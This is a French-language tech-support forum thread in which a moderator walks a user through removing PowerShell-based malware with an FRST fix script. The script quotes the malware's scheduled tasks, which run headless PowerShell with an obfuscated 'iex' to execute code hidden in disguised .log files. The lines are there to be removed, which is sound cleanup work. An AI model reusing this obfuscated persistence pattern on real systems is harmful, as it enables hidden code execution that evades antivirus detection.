Virus via Powershell non détecté par antivirus

Résolu/Fermé
neva - Modifié le 22 janv. 2024 à 09:59
bazfile Messages postés 56988 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 18 janvier 2025 - 22 janv. 2024 à 13:19

Bonjour,

Mes fenêtres de navigation internet se ferment toutes seules de façon intempestive et mon ordinateur est incroyablement lent...

Le scan de l'antivirus ne détecte pas de virus :-/ Même chose en changeant d'antivirus, si ce n'est que maintenant, j'ai un message toutes les minutes pour m'indiquer que PowerShell tente de télécharger une "ressource malveillante"...

Comment faire pour me débarrasser de ce virus ?

J'ai téléchargé FRST et réalisé une analyse, et j'ai obtenu les fichiers suivants :

FRST : https://www.cjoint.com/c/NAvtGdBoQjO 

Addition : https://www.cjoint.com/c/NAvtHGZr3OO 

Est-ce que quelqu'un pourrait m'aider à résoudre le problème, svp ?

Merci d'avance !

A voir également:

4 réponses

bazfile Messages postés 56988 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 18 janvier 2025 19 402
21 janv. 2024 à 20:55

Bonjour.

Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST en tant qu'administrateur pour cela clique avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :

 
Start::
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction
Task: {5BDF7750-104E-4305-AFB4-A6A5EE7E71CC} - System32\Tasks\Disable-StorageBusDisk_QoS => C:\Windows\system32\conhost.exe [867328 2023-11-15] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell .$([char](9811-9706)+'ex') (get-content 'C:\Users\Moi\AppData\Local\Microsoft\FontCache\Disable-StorageBusDisk_QoS.log' -raw)
Task: {0FD97DBC-EB72-4D2F-8C85-DFA80F5CD1E9} - System32\Tasks\Remove-SmbMapping => C:\Windows\system32\conhost.exe [867328 2023-11-15] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell .$([char](9666-9561)+'ex') (get-content 'C:\Users\Moi\AppData\Roaming\Evernote\Remove-SmbMapping.log' -raw)
CustomCLSID: HKU\S-1-5-21-100550643-309752111-2504242606-1001_Classes\CLSID\{d1b22d3d-8585-53a6-acb3-0e803c7e8d2a}\localserver32 -> "C:\Users\Moi\AppData\Local\Microsoft\Teams\current\Teams.exe" --toast => Pas de fichier
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} =>  -> Pas de fichier
FirewallRules: [{AB82685C-A804-401D-A689-F2CC6976CC1C}] => (Allow) C:\Users\Moi\AppData\Roaming\Zoom\bin\Zoom.exe => Pas de fichier
FirewallRules: [{B8C1F800-5A6C-4410-BD96-23A58E65D618}] => (Allow) C:\Users\Moi\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
FirewallRules: [{CDE9013F-2AD4-4B07-BBF9-BB4DFE36F6E3}] => (Allow) C:\Users\Moi\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
FirewallRules: [TCP Query User{48BF4937-BD83-4396-BC4D-523B834C6EB9}C:\users\moi\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\moi\appdata\local\microsoft\teams\current\teams.exe => Pas de fichier
FirewallRules: [UDP Query User{0386DB80-7819-4240-A10F-2346D1047168}C:\users\moi\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\moi\appdata\local\microsoft\teams\current\teams.exe => Pas de fichier
FirewallRules: [TCP Query User{8242F23C-D2D5-4953-A308-D2CE8ABEE833}C:\users\moi\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\moi\appdata\local\microsoft\teams\current\teams.exe => Pas de fichier
FirewallRules: [UDP Query User{48ED6887-9F4D-4BFC-B827-2882819E68F8}C:\users\moi\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\moi\appdata\local\microsoft\teams\current\teams.exe => Pas de fichier
FirewallRules: [{8584D4CD-E04E-4429-B972-F5CF80206ED1}] => (Allow) powershell.exe => Pas de fichier
FirewallRules: [{45D117A2-2887-4E35-8A24-4A4A5D52742D}] => (Allow) powershell.exe => Pas de fichier
FirewallRules: [{1435E397-3753-44AD-9BFA-A34C0629D09D}] => (Allow) powershell.exe => Pas de fichier
FirewallRules: [{B37DBD4C-7378-474A-8B0D-9B71097B3FB6}] => (Allow) powershell.exe => Pas de fichier
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
 


Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ce rapport fixlog sur https://www.cjoint.com/ puis donne le lien généré par https://www.cjoint.com/ dans ta réponse.

5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT


1
bazfile Messages postés 56988 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 18 janvier 2025 19 402
22 janv. 2024 à 10:08

Le fixlog est OK.

Si tout est OK pour toi :
Désinstalle FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.


1

Bonjour et merci beaucoup d'avoir pris le temps de me répondre :)

J'ai suivi ton mode d'emploi et voici le lien du fichier Fixlog obtenu :

https://www.cjoint.com/c/NAwi7aqCKRO

Je croise les doigts pour que ce soit suffisant (en tout cas, j'ai moins de messages de l'antivirus, et l'ordi me paraît plus rapide).

0

Un immense merci pour l'aide efficace et rapide que tu m'as apportée ! C'est un vrai soulagement de "récupérer" mon pc avec un fonctionnement normal :)

J'en profite pour remettre un certain nombre de choses à niveau. Je vais désormais utiliser Bitwarden pour mes mots de passe. Pour ce qui est des antivirus, est-ce que tu en aurais un à me conseiller, pour éviter ce type d'intrusions ?

0
bazfile Messages postés 56988 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 18 janvier 2025 19 402
22 janv. 2024 à 13:19

Pour ce qui est des intrusions un antivirus quel qu'il soit ne peut pas tout empêcher, tu as Bitdefender c'est un excellent antivirus donc ne change rien, pour information Windows a son propre antivirus, il est gratuit et efficace il s'active automatiquement dés qu'aucun autre antivirus n'est installé sur le pc.

1